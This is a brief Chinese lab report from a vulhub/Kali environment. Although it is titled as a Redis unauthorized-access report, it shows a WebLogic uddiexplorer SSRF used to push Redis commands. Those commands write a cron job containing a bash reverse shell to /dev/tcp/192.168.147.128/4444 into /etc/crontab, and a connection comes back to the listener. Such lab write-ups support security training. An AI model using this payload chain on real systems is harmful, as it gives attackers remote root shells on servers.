Redis未授权访问漏洞报告

环境使用：kali、vulhub、burp suite（bp）

开始：打开vulhub，打开终端，进入root



ifconfig查看ip地址

找到ip 为192.168.147.139

查看端口开放情况，7001开放

浏览器打开192.168.147.139:7001，发现404报错，是客户端错误，说明服务端开启的，只是访问失败

在后面加上/uddiexplorer/SearchPublicRegistries.jsp，发现跳到这个页面

在后面加上
uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
访问失败，也说明了服务器能访问，可以使用漏洞

在vulhub输入docker ps 找到ID和NAMES 然后使用docker exec -it ID/NAMES ip addr 找到ip

打开bp，使用bp抓包，改包

打开kali，ifconfig，并打开4444端口，等待连接

将set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.147.128/4444 0>&1\n\n\n\n” config set dir /etc/ config set dbfilename crontab save 进行url编码

将编码内容加入到链接

发现kali的4444端口连接成功
退出，重新连接，一样成功

完成测试报告